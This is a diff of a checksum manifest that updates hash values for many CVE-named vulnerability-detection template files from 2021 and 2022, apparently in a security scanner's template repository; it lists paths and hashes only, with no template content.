+http/cves/2021/CVE-2021-39226.yaml:e0e9268fe2647cd38c4e255c94f034996525c183 http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 -http/cves/2021/CVE-2021-39320.yaml:4da11bd04c1100c95d63586cbbea545754760040 +http/cves/2021/CVE-2021-39320.yaml:d55743bd0c30e3310dea7ffc7530dea784d1938f http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 http/cves/2021/CVE-2021-39327.yaml:4b9e392a8aed5ba3712bfa79673e89e403616964 http/cves/2021/CVE-2021-39350.yaml:bc1436fd7acd615ef4528971efa6a5066aa3b4d1 -http/cves/2021/CVE-2021-39433.yaml:7d1d7f4e16f6fee2c425c16273e43f8142d0f2ee -http/cves/2021/CVE-2021-39501.yaml:d723e3ef80444a326cfbcb71657d3cb432d06a82 -http/cves/2021/CVE-2021-40149.yaml:de2fa38e40854a7b489efdb8dedf3aba0e81bd2a -http/cves/2021/CVE-2021-40150.yaml:c1a08ac6f5dec1dd86448a20e2fdef4f7276013f -http/cves/2021/CVE-2021-40323.yaml:6459e451a2784e99145aab12e0b99cfc798bce98 -http/cves/2021/CVE-2021-40438.yaml:0c90154c80bd3565602e13a944e5d5cafb524347 -http/cves/2021/CVE-2021-40539.yaml:b2fd13e2f6c7e04b850ff94ade764ab130662b46 -http/cves/2021/CVE-2021-40542.yaml:087f4922d827d8604bd09a556188877b2dccf605 -http/cves/2021/CVE-2021-40651.yaml:959f4704824808be91bcfe0738266a17115faeba +http/cves/2021/CVE-2021-39433.yaml:beec72dfa9c2836d611a71dd565dcb142a72da31 +http/cves/2021/CVE-2021-39501.yaml:ec5ad1d64e6c1246ab273c38b912fcbddd7637af +http/cves/2021/CVE-2021-40149.yaml:1676310c0067f153ab7305bba1472380a767a0a8 +http/cves/2021/CVE-2021-40150.yaml:19dbd3ac074a19d46cf672e82952cce57dc7d871 +http/cves/2021/CVE-2021-40323.yaml:497d6b22e1eccc32f89e716d8290750b9e130abe +http/cves/2021/CVE-2021-40438.yaml:6e016c28d12e67a00a23bcf35b0cfb22888eb797 +http/cves/2021/CVE-2021-40539.yaml:eabff516d0834f61841b5f29e1bc4fbe2f6fca41 +http/cves/2021/CVE-2021-40542.yaml:d24460225cb566c0790fa0cf0293e9ccd121a84a +http/cves/2021/CVE-2021-40651.yaml:d0c2949c384e736bbc945a24017f05aa28d30d38 http/cves/2021/CVE-2021-40661.yaml:f780fd916ac3f8d1c70ea104c4cbf11905176041 -http/cves/2021/CVE-2021-40822.yaml:cd334eabdae2efe8dba8e13de1ad9022c2683ed1 +http/cves/2021/CVE-2021-40822.yaml:97de64ee2998793338d9184a47c51605cd2f6437 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 -http/cves/2021/CVE-2021-40868.yaml:ad6add8c1267887bc3a86a8a1a010d32abf4a5ac -http/cves/2021/CVE-2021-40870.yaml:842124570baf16773a52fe3d69d8a5a05259ae52 -http/cves/2021/CVE-2021-40875.yaml:f0fe555e8f66c1c6ff93f5bfaf55dd364a945efc -http/cves/2021/CVE-2021-40908.yaml:33321e29227bca645ee3c7ce9350fa3e6795ea11 +http/cves/2021/CVE-2021-40868.yaml:a56bcaccdc7226a4b01f50507ef4a5b829cb5f02 +http/cves/2021/CVE-2021-40870.yaml:11ada269b8beb5ea7aa3d62a68dbeedfd7a574f1 +http/cves/2021/CVE-2021-40875.yaml:f1df098a240419566a0da1c521e7d16b038af00e +http/cves/2021/CVE-2021-40908.yaml:ce2725650a88ab95a4d556943be0b731c227b9a1 http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:1344890ecb02ecc79c598b08803db689194562fe -http/cves/2021/CVE-2021-40969.yaml:45503ff040bdb468872b382c5a3bfeb75b871c50 -http/cves/2021/CVE-2021-40970.yaml:22537f287554d1fb3f08f08c3f7997c11a671af0 -http/cves/2021/CVE-2021-40971.yaml:79b2d87fa7d88703eb83a3b2f95b8264871ab70d -http/cves/2021/CVE-2021-40972.yaml:d27431d64ba53011509e840670cc2119f4dc6be9 -http/cves/2021/CVE-2021-40973.yaml:e4beb729c195766e7d1b9460eb88a622e2780258 -http/cves/2021/CVE-2021-40978.yaml:62ebc40431004d08ba54cf76229e706d2402c44a -http/cves/2021/CVE-2021-41174.yaml:4c24cd07dea7803624fb8d4cfa46b618c024d961 -http/cves/2021/CVE-2021-41192.yaml:601ba7b0718721723f1f23a60b055c0f03c7c755 +http/cves/2021/CVE-2021-40968.yaml:895232a56db6a7a97be40d4df4ca9a077580b7af +http/cves/2021/CVE-2021-40969.yaml:2c9bc3c0fc3481d3acd05f7dca5c2bdcab22680e +http/cves/2021/CVE-2021-40970.yaml:93c2c81ee58923603e9e76719ed3f265b354a6d9 +http/cves/2021/CVE-2021-40971.yaml:82479de07114ce2af5d9d054af5772e24fab4728 +http/cves/2021/CVE-2021-40972.yaml:5b1033503e68799ee48c7db99fe18022bbf90090 +http/cves/2021/CVE-2021-40973.yaml:cfebb17252bd68b2249cb86a685eee07c23f5c5b +http/cves/2021/CVE-2021-40978.yaml:69bfcf37ede0809cb9194d5537dac75694206fcc +http/cves/2021/CVE-2021-41174.yaml:f477462b5dd4cbb876d98c9b75e58aa99e70bbce +http/cves/2021/CVE-2021-41192.yaml:4cab8c9850131699d5522c858a61c02f55adfa07 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:8fda77b1487c28d680cc2eae21e04c291c2a660d -http/cves/2021/CVE-2021-41282.yaml:40c118c32ea07c6cbfab601a6e9c7999dd44ac79 -http/cves/2021/CVE-2021-41291.yaml:c3ef1e52bae2f2e5ff0f342ef10901a10c4ee0b2 -http/cves/2021/CVE-2021-41293.yaml:7b00e5acfba83ae6a436bf8ac2b242709f2e93a8 -http/cves/2021/CVE-2021-41349.yaml:a17dcc5a512d28681730ea5113d2c03e02d3bbe5 +http/cves/2021/CVE-2021-41277.yaml:1af9e26de8fd408f138f1ae8ea29f2f3772eb6bd +http/cves/2021/CVE-2021-41282.yaml:08dfe9f24d6edcba12decc8b0f52a30d4d111abc +http/cves/2021/CVE-2021-41291.yaml:8dfa8bb00874c95e87205cf611780c323317bbc1 +http/cves/2021/CVE-2021-41293.yaml:45713072befbaf77ed6f28d8582ce10f5d825984 +http/cves/2021/CVE-2021-41349.yaml:094ece33db1ffd227f413f689ec74783b821fb78 http/cves/2021/CVE-2021-41381.yaml:0a52047e8dde8f010728956b9e9d71088ddb87e8 -http/cves/2021/CVE-2021-41432.yaml:108764451699d58b7abcfa207dd9876e922507f1 +http/cves/2021/CVE-2021-41432.yaml:09b5dddb286ad439bc6a693c958d166f983b0ae5 http/cves/2021/CVE-2021-41460.yaml:ae7e6179c5d6ca32450f81c03fcaf39d34b8221d -http/cves/2021/CVE-2021-41467.yaml:e42e6139f99ba4b0e35d0551f535982f6226933e +http/cves/2021/CVE-2021-41467.yaml:5e6337c03bac6733a42d4bc9b8d0dc36f50178e8 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d http/cves/2021/CVE-2021-41648.yaml:60e9dcc0e99f1df5353d44d464fb0b7cd0593caf -http/cves/2021/CVE-2021-41649.yaml:1820514e097581f98f0eb4dc207503bc05b80b3e +http/cves/2021/CVE-2021-41649.yaml:4bc0c7180842cade90762bf71eb0b3d96c96f590 http/cves/2021/CVE-2021-41653.yaml:3578aadef6ceea1b69fa0a6bf5a05a51afe45504 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:16c931996a6d3f32ba2693b16b550798570880f9 +http/cves/2021/CVE-2021-41749.yaml:8ebb8ac082d62b69b2b0512fa21901b5bb5f9387 http/cves/2021/CVE-2021-41773.yaml:90279d433d0c1af880ab2755946704d9729786bc http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:4782871134f63bda86531b05a80e5a394552a206 -http/cves/2021/CVE-2021-41951.yaml:22841428b97ac79944c55c7802d09785f5c1a552 -http/cves/2021/CVE-2021-42013.yaml:226f248c5ca9b84315138a8a254a4531b1ddc280 -http/cves/2021/CVE-2021-42063.yaml:3a937ef1458dccb6499734daab4bd68cad2f6dae +http/cves/2021/CVE-2021-4191.yaml:7b6890c08e0ea17ae011f8c97340db77e0a90639 +http/cves/2021/CVE-2021-41951.yaml:0374f8f953e5e675bc35f3f9b4ed514822a56f2b +http/cves/2021/CVE-2021-42013.yaml:a5fe8608cfd03f9f39c5cb3c615383f46af38d3b +http/cves/2021/CVE-2021-42063.yaml:fb21c370ffa8b569b5f3c0a9c5877a0024953afb http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 http/cves/2021/CVE-2021-42192.yaml:b812ebb74367408339a3d62bab21f8e1d2ae996a -http/cves/2021/CVE-2021-42237.yaml:a551450d4cbf7093947899db04aa8c33079bf324 +http/cves/2021/CVE-2021-42237.yaml:65d95d359203e835304459159321ad52af420af8 http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d http/cves/2021/CVE-2021-42551.yaml:423c75207a7156988c7470f235754d787fc81dd5 -http/cves/2021/CVE-2021-42565.yaml:6944af37fd5d100670dffd02e52d7cb8a003bfeb -http/cves/2021/CVE-2021-42566.yaml:9e2905327566b76241afb6077014210b0e041592 -http/cves/2021/CVE-2021-42567.yaml:15c4be6b0e1a680776ef69afebce3f9ad19f42f8 -http/cves/2021/CVE-2021-42627.yaml:961bc850cac15f0aba94dfcdeda91774ea7b8f39 +http/cves/2021/CVE-2021-42565.yaml:b7050a52d1b9adc6589b30134c98ca7586b255fb +http/cves/2021/CVE-2021-42566.yaml:c8ae361a4557972af3ababd668677d47cbde2b99 +http/cves/2021/CVE-2021-42567.yaml:a80ad6215969060c0d6bc11412a6d1528c80ee57 +http/cves/2021/CVE-2021-42627.yaml:118a460e44bf332539c3bffe407752be1d66e97b http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 -http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:924e0ab303bf4959fb489490c4a5592747b44abe -http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 +http/cves/2021/CVE-2021-42887.yaml:b652a696751484e4fe62faa5f76b35173b2750d1 +http/cves/2021/CVE-2021-43062.yaml:3ad8c35e2a4d1d1eb6575e9bfa202614ff9bf45c +http/cves/2021/CVE-2021-43287.yaml:89df229aa87f93a0d9b8a0862fc87506c394d086 +http/cves/2021/CVE-2021-43421.yaml:9e9538c9f9a44082df040bc55a071f244bf1c0bc http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 -http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 -http/cves/2021/CVE-2021-43510.yaml:6a715fa92f6c950a00c0fc1fc6c9529c85af44ac -http/cves/2021/CVE-2021-43574.yaml:09592ca52ecc2e5af5af7e8dc8ff0e993ed3964d -http/cves/2021/CVE-2021-43725.yaml:88b96d3de9522c637b1f65061f612d2e28057641 -http/cves/2021/CVE-2021-43734.yaml:e894c25dddf786720827f0d04cbb1ce62b0fc5a3 -http/cves/2021/CVE-2021-43778.yaml:a818c4a9529440a5ef1d0cee1137bfeb81f8fb8f -http/cves/2021/CVE-2021-43798.yaml:3fda0fce3323a14832f734cfd676fde41f594185 -http/cves/2021/CVE-2021-43810.yaml:f5e09afb19cc82f7eea63a4c419e1cf03fb8d4f4 -http/cves/2021/CVE-2021-44077.yaml:6b520f9b38a52e6be45d90a39ea3b27e2a60e5a9 -http/cves/2021/CVE-2021-44138.yaml:3ed6442569d763d03a386d077dc0bfe58065c5dd -http/cves/2021/CVE-2021-44139.yaml:3c3960880978e880e2074828a0b4733bf34175e8 -http/cves/2021/CVE-2021-44152.yaml:cfadff3f08b9e7d6c7b50daa97354ef2898ae8e1 -http/cves/2021/CVE-2021-44228.yaml:eab008e5f47b798c36d737835d6e8c5320151056 -http/cves/2021/CVE-2021-44427.yaml:8352d5bef0fff2a9e40667ca0261b77cb84a8d74 -http/cves/2021/CVE-2021-44451.yaml:2f0210462f32cf9543ddca83b1b9d4f7d1017ee6 -http/cves/2021/CVE-2021-44515.yaml:88c0f1db2a20ac5b093db8f821f1486d13e566ae -http/cves/2021/CVE-2021-44528.yaml:ef4c6bac1cb0df014cfa2c08070a86efe58f5419 -http/cves/2021/CVE-2021-44529.yaml:7ae36c90617c36ff8e6b61552b67bb5ac6cbf054 -http/cves/2021/CVE-2021-44848.yaml:1d0b33807b84d51bfa36eaa82d33585be45e5d43 +http/cves/2021/CVE-2021-43496.yaml:e5290c4bf73b51d8d7a9b72b786da52c792efacc +http/cves/2021/CVE-2021-43510.yaml:5bbb323d593178e5a7fad0f15f9ce444cc54660a +http/cves/2021/CVE-2021-43574.yaml:58127d69ee6b55562a1adb0d6c8727a953f75d84 +http/cves/2021/CVE-2021-43725.yaml:41ce9d637952eb2ca404f208919ceb9cfe13dc6d +http/cves/2021/CVE-2021-43734.yaml:dba526b082cfc049008079854f5c358cdc54dc74 +http/cves/2021/CVE-2021-43778.yaml:ad88d645783c6b9746154a4117a8ca7959b9ca96 +http/cves/2021/CVE-2021-43798.yaml:de04e3df23ebd2c069be1b336f0012aac224cd20 +http/cves/2021/CVE-2021-43810.yaml:526535289d787090ef90d066f958104848576da4 +http/cves/2021/CVE-2021-44077.yaml:1644a3a64ebce7407238683eb03183ff9c26bd36 +http/cves/2021/CVE-2021-44138.yaml:3c5c76e5460123baafa27dd63bb85b79548a6df3 +http/cves/2021/CVE-2021-44139.yaml:fa88a23765b635e301c27d0c9156c82885acd14c +http/cves/2021/CVE-2021-44152.yaml:8b5d9cf98c57998620f4fa6442de1afa32329253 +http/cves/2021/CVE-2021-44228.yaml:f545ebcc0e97655ca69d29d9f4621a84bf8f1c11 +http/cves/2021/CVE-2021-44427.yaml:6b68d18623ee449f8123ae7d1814abea2ebba95c +http/cves/2021/CVE-2021-44451.yaml:d426662cca643eebe07c7c3ffa4ee527ae38c573 +http/cves/2021/CVE-2021-44515.yaml:2377df3a403f2b0e4348f80c3d8a0657dcfe6767 +http/cves/2021/CVE-2021-44528.yaml:dd96edc7d677dbffbb885fa6e72343c6d483e914 +http/cves/2021/CVE-2021-44529.yaml:cf9873ecc8d0687caf0d1ec7437ad2a149444a92 +http/cves/2021/CVE-2021-44848.yaml:72866e10d920ae7ab6caef5d0b943cb17ab72665 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:3dc1a30e775cf97df6480b960e7de4dace503f16 -http/cves/2021/CVE-2021-45046.yaml:ab54d8d7c41b72e6af22ab1c0316179ca0721022 -http/cves/2021/CVE-2021-45092.yaml:c011343d701055e65c405a97e6018769b6eac7e3 -http/cves/2021/CVE-2021-45232.yaml:e55af1872e98119ef827bb4601f54ea270b9e0db -http/cves/2021/CVE-2021-45380.yaml:b0a36ebbdf9d11c1e87ff821fc37941d813b7674 +http/cves/2021/CVE-2021-45043.yaml:4db365b28f347995f9a00d0cf3a86607d90450b7 +http/cves/2021/CVE-2021-45046.yaml:0b49378253d16c99f2ee11fbae7118a9bc97b1a0 +http/cves/2021/CVE-2021-45092.yaml:1dba004d7ee00fa91c11183e02de07b361e0bf4f +http/cves/2021/CVE-2021-45232.yaml:d2c1bafb15044e35687dd8b61324bbcaa9663c97 +http/cves/2021/CVE-2021-45380.yaml:28a8998161318fb791ec581cb4c6a3c5245833d4 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:d382e98a7b5b5975441bb2c9e805b1153cdcc4a6 -http/cves/2021/CVE-2021-45428.yaml:05a5171c50d7f024aa4e877dde0dd2b347506058 +http/cves/2021/CVE-2021-45422.yaml:5f575fea8f02589ffefda0f7bbb15ed05cb6e06a +http/cves/2021/CVE-2021-45428.yaml:7a5a27ecbf32f0b4d97e631a5b7dff3c5273918e http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 -http/cves/2021/CVE-2021-45968.yaml:d1d66fda8d1879cb454059dfd09ba2b346b5a388 -http/cves/2021/CVE-2021-46005.yaml:6bb2ff9807d5a97455e9257bbace6106a4cb7ea7 +http/cves/2021/CVE-2021-45968.yaml:d6e44da357371f41e4af563fb03bccd9de105665 +http/cves/2021/CVE-2021-46005.yaml:37a4af6e976d9154a3acd2b3114fc430ffe28688 http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 -http/cves/2021/CVE-2021-46069.yaml:5b336e29b8031fcb6ce1ff4cf3e3c67cec37f179 -http/cves/2021/CVE-2021-46071.yaml:fd032d70b32714340431310aceb49947c0b47b62 -http/cves/2021/CVE-2021-46072.yaml:2972404e42dd53a3fd50761bbb516f8270d56932 +http/cves/2021/CVE-2021-46069.yaml:263123f9863d0fff4b12647b2af0d70f61e1da93 +http/cves/2021/CVE-2021-46071.yaml:be69e1de19a625ea890c5adc664197ed219e5c5c +http/cves/2021/CVE-2021-46072.yaml:c94fbbed0b6f71806b45297c2ad54aaeac656efe http/cves/2021/CVE-2021-46073.yaml:370eac8c9753d59b40b3ace444f6ac9875a63e30 -http/cves/2021/CVE-2021-46107.yaml:b5e0e7c9a7fa1bcfb1fcc5d76055c0ef6365e6fa +http/cves/2021/CVE-2021-46107.yaml:b9bad6acbf7575d9c393b2564265e1a5691f1c46 http/cves/2021/CVE-2021-46379.yaml:8d6452a442fe0d4a02cdb518cb4b8c8b1a74ef0f -http/cves/2021/CVE-2021-46381.yaml:5d6a99225c83ecb36c7c8171667062ca3f32ba7c -http/cves/2021/CVE-2021-46387.yaml:8fab3f08cc901f449d942141a859729988cdc5ae -http/cves/2021/CVE-2021-46417.yaml:f4478dbdfb7f794c667f00087b7906ad4b328a82 -http/cves/2021/CVE-2021-46418.yaml:1427f7b8ad7adbbe6c5731442531557e1595eb17 -http/cves/2021/CVE-2021-46419.yaml:ee41acae4b7831d15d1c5071f1374d3cb7005c53 -http/cves/2021/CVE-2021-46422.yaml:1940500e991d897184dd58695ffadcf0e79a4762 -http/cves/2021/CVE-2021-46424.yaml:ed75719db1cbc4a6ffca8c5aab06acf3737811d1 -http/cves/2021/CVE-2021-46704.yaml:bb0991b368daf0247f160096c06a9f3c4df48315 -http/cves/2022/CVE-2022-0087.yaml:079b5b165f0ced4d2b4d19011aed225edf88922d +http/cves/2021/CVE-2021-46381.yaml:75b38da693dfd3d74f643fe7a39ee9dfcdfbab34 +http/cves/2021/CVE-2021-46387.yaml:820741fa5c155a62a65ae03741bade8e1b8316cb +http/cves/2021/CVE-2021-46417.yaml:184828b0c60562bd2dfa267fb1cb42935258ef31 +http/cves/2021/CVE-2021-46418.yaml:0f395c12b1e0e2faa82edd9aea14d17d6771f97a +http/cves/2021/CVE-2021-46419.yaml:e2a58404236416ee7faf026547c70a201b604f58 +http/cves/2021/CVE-2021-46422.yaml:41d3ddae9c0fd140ccaccf65b05c44de8071d9ff +http/cves/2021/CVE-2021-46424.yaml:0a01448b7eebb11fa41787e31ff4df5ae1b80cfc +http/cves/2021/CVE-2021-46704.yaml:75ccf63cb86b0455de6ed2f3a18f9461036f737d +http/cves/2022/CVE-2022-0087.yaml:96d30fc9b4ecbcc340068ec0a2e0893ff40f1752 http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 -http/cves/2022/CVE-2022-0147.yaml:1a83d39854e41065ebcf4dc8e6d67d9125b82e16 -http/cves/2022/CVE-2022-0148.yaml:5871f1679ebd2c67803f35c27e4f7242100b0136 -http/cves/2022/CVE-2022-0149.yaml:bd2461d7faaad506248071710bb68b1f24db28f9 -http/cves/2022/CVE-2022-0150.yaml:32c8a959cacb99ecdcf009c07e8f4270f9f36180 +http/cves/2022/CVE-2022-0147.yaml:58d1f7087d04a19479c6059d2a351e89067e57cf +http/cves/2022/CVE-2022-0148.yaml:c519410ada58a1024c581fbb8390ee16fce23b5c +http/cves/2022/CVE-2022-0149.yaml:cdaa1e7fa3d3965d3a5a7e68d7ed2ee002783309 +http/cves/2022/CVE-2022-0150.yaml:92f4eda8d824338d40eff023455effea0deed7c6 http/cves/2022/CVE-2022-0165.yaml:e21ba3dfe35f2b3998366d54a92f873f4a043135 -http/cves/2022/CVE-2022-0169.yaml:5d2ef28e8cae4b8d9d50cb0c26382febdef06876 -http/cves/2022/CVE-2022-0189.yaml:2ac4be867e0f6f5947612f92518844456426e4b9 +http/cves/2022/CVE-2022-0169.yaml:ae25c860e5de463251aae8fe4403d4819809ab4f +http/cves/2022/CVE-2022-0189.yaml:378e59aea7a1b26e04c778902959a4bd92d7bfa3 http/cves/2022/CVE-2022-0201.yaml:04312080723927883df87137d0d5eb769d3c4045 -http/cves/2022/CVE-2022-0206.yaml:98538983614b5435d052063d5025620d45d34cc3 +http/cves/2022/CVE-2022-0206.yaml:5f45d476b92fcb037c75b1f3a91136ac8e8007c2 http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 -http/cves/2022/CVE-2022-0212.yaml:0d32006ad209e1e5adf8201352c8e1a2c2df999f +http/cves/2022/CVE-2022-0212.yaml:569f37fa82968453259475bb02344ce05c1f1238 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 http/cves/2022/CVE-2022-0220.yaml:b3d359e13bca582b964565a09419347cfde13608 -http/cves/2022/CVE-2022-0228.yaml:a83d72a11518097b60bec9335805abbea9d4897b -http/cves/2022/CVE-2022-0234.yaml:c156dc2ea8b3495550a16bb001815a2a5ceba986 -http/cves/2022/CVE-2022-0271.yaml:2d67c3123eda5c25890bd0e102c596bf82ddb1f8 -http/cves/2022/CVE-2022-0281.yaml:72f9de367730580e99ca7db6ce543b8fd402bed8 -http/cves/2022/CVE-2022-0288.yaml:ef6ef3e095085b49d1ff00fcda67de32817a4fad -http/cves/2022/CVE-2022-0342.yaml:656cc5253901ce8a96b491eacf85d37063ef2740 +http/cves/2022/CVE-2022-0228.yaml:6b2faa22a3cc9535bbc2118316d8c0a5c85d691d +http/cves/2022/CVE-2022-0234.yaml:1bf0c595f2a6fde1563f84feb27890832a698099 +http/cves/2022/CVE-2022-0271.yaml:982ff0fc90e3568327d23b1b61e5474792599782 +http/cves/2022/CVE-2022-0281.yaml:f7e979cfdee4932734b6f202712c5bf02067a72a +http/cves/2022/CVE-2022-0288.yaml:f1cf4803487648721e9ed10c23c2de84dd60e245 +http/cves/2022/CVE-2022-0342.yaml:a0b57e0b25d6bd42a09f0e97e76fd6067b2e9f2d http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 -http/cves/2022/CVE-2022-0349.yaml:ef97eb036c6f3261a351b7779f241326b22294af -http/cves/2022/CVE-2022-0378.yaml:103ae4154a5392f886c8b9d7c8597d8b8c61bcd9 +http/cves/2022/CVE-2022-0349.yaml:fdde6d3801452f54280f76f5b7218e6af3874c20 +http/cves/2022/CVE-2022-0378.yaml:f9b45d78cc2fa38664b2888e1a6668e0f8db071e http/cves/2022/CVE-2022-0381.yaml:bab0c1f47359cc9c8960f33d7266351eb1565086 http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 -http/cves/2022/CVE-2022-0415.yaml:3bdb92c7b27807c3cf304dd2bc7c58a58755e97a -http/cves/2022/CVE-2022-0422.yaml:7c3f7d09252b28f990cef76bca9828374832eb5a -http/cves/2022/CVE-2022-0424.yaml:e72d924c262da43cc29df390775f35e6d387600a -http/cves/2022/CVE-2022-0432.yaml:ed86ddc9724813ca30f45216f1b7259f8e9795f5 -http/cves/2022/CVE-2022-0434.yaml:549395197b6ca57a38df261767d51ea9cbd3eb2e +http/cves/2022/CVE-2022-0415.yaml:43badfdc1cb603cabd639e037e7ca72baa540347 +http/cves/2022/CVE-2022-0422.yaml:8955d66723dc59c09675534435b4c93aa2cef1fa +http/cves/2022/CVE-2022-0424.yaml:f09a2112a5421d11aac45e34938d600b74c71333 +http/cves/2022/CVE-2022-0432.yaml:b492288e1d57520617110aa8577bcf2bf832c785 +http/cves/2022/CVE-2022-0434.yaml:e695ba2491bce90444a1058b27bef6690c4865b3 http/cves/2022/CVE-2022-0437.yaml:6a57d2ad863ac623a9a0ce5108e7620bd56e11fa http/cves/2022/CVE-2022-0441.yaml:c0d4b5a324d0e9415535f698f4ee3278d8225377 http/cves/2022/CVE-2022-0482.yaml:06f529926dbce7d867c0aa57cea96bc261ae7feb -http/cves/2022/CVE-2022-0533.yaml:2c80e7cf8c05ef1937dae10f2d8a91c35b5911c6 +http/cves/2022/CVE-2022-0533.yaml:8efd15c2a82f958f59acde765060ab45e5170dee http/cves/2022/CVE-2022-0535.yaml:12c5101dc64287aa7ed4e6e95b4c82b2e507ace5 http/cves/2022/CVE-2022-0540.yaml:a3a2456f497dd9162f512c1cefdc2ae77cb2bfb5 http/cves/2022/CVE-2022-0591.yaml:fd13351808c85fd8f0b666270fe6d7afaadab094 http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 -http/cves/2022/CVE-2022-0597.yaml:0c8ae035c83c4d7e3ef71117a9eacb6bd716a335 -http/cves/2022/CVE-2022-0599.yaml:e02a459e7e195b7676a70f59e47a9d1c353461e1 -http/cves/2022/CVE-2022-0651.yaml:a2ea81e257cc617f153868652e6ad67d4e40bd69 -http/cves/2022/CVE-2022-0653.yaml:202cc5e88f93d969735d9e3193d283a7e06e8ca3 -http/cves/2022/CVE-2022-0656.yaml:2a60d736d0fd75de3ab8d772b91f70f3bb05a248 -http/cves/2022/CVE-2022-0658.yaml:e6836815fe3551cf116830fb171cae9ec27cb00d -http/cves/2022/CVE-2022-0660.yaml:4171a90200d1541b5cfdaeb31c5b1ddf593a9a9c -http/cves/2022/CVE-2022-0678.yaml:1e589bfadd05decd9ff1eae50673c1d333ec4a63 +http/cves/2022/CVE-2022-0597.yaml:d1d3926087f435937d89a594bed0ecd848c8f87c +http/cves/2022/CVE-2022-0599.yaml:5047f9351c72fd3ee1ea33792568fcafffeaa5b6 +http/cves/2022/CVE-2022-0651.yaml:66883e63762a7cfc40b7b1bbe8513e396c0b0808 +http/cves/2022/CVE-2022-0653.yaml:47ee405bc84ddace974e1fda1f02051c1dddf3c2 +http/cves/2022/CVE-2022-0656.yaml:aa79d191591143c2dac13f1550f5823bc4f8cbec +http/cves/2022/CVE-2022-0658.yaml:e9d2506aa81aedd4fcfdb9d9cb911de0aa78d291 +http/cves/2022/CVE-2022-0660.yaml:76399d19000084ed00adedb6c8470124bb24b13f +http/cves/2022/CVE-2022-0678.yaml:b700d1edcc4b2055ff74f19cc3c59fba1e37df8b http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b -http/cves/2022/CVE-2022-0692.yaml:39c529ae5a91dfecd9baae14517af65033b58310 -http/cves/2022/CVE-2022-0693.yaml:95a1750372bd447d4a166fa887de5efb45b9df10 -http/cves/2022/CVE-2022-0735.yaml:4f7f932ce9eafc3c24cacff46cb5bf3516728b34 -http/cves/2022/CVE-2022-0747.yaml:8952ffae68a40b8f07140fc38ae99384b3cf5996 +http/cves/2022/CVE-2022-0692.yaml:b1a4dfacd3f66b6caa45ced45b15aaa91c917c79 +http/cves/2022/CVE-2022-0693.yaml:dd7ae739fa250c7ac4a291b5d0c671aeec0c2f58 +http/cves/2022/CVE-2022-0735.yaml:ef04222d839a546ee3cc85be31cf26430e5a9f68 +http/cves/2022/CVE-2022-0747.yaml:c52251229e43870a5ea620229c77c5d597ac5f29 http/cves/2022/CVE-2022-0760.yaml:6cb4a03a430f9731eb6888abbb95be407f48dd01 -http/cves/2022/CVE-2022-0769.yaml:2b38882ff992a6710e5b1d935cd431ee463155b7 +http/cves/2022/CVE-2022-0769.yaml:9ac274bdbd78d38e2ca5aef5fa435045802b6e85 http/cves/2022/CVE-2022-0773.yaml:60911205f06d37439f55025d19e56f3cdef9f67c -http/cves/2022/CVE-2022-0776.yaml:9fb47d353fe80ac20c4dfb70a4ed463f39bc2172 -http/cves/2022/CVE-2022-0781.yaml:9b26046006901eae840424fa21c494362041f1ec +http/cves/2022/CVE-2022-0776.yaml:6cbcf9b4ed542cb22fb375f7ce0876df4ae639e0 +http/cves/2022/CVE-2022-0781.yaml:0806f48764264766afccada2acc2f98827602354 http/cves/2022/CVE-2022-0784.yaml:339ca31d50774616a5f566cb81ab5bd55e46a59b 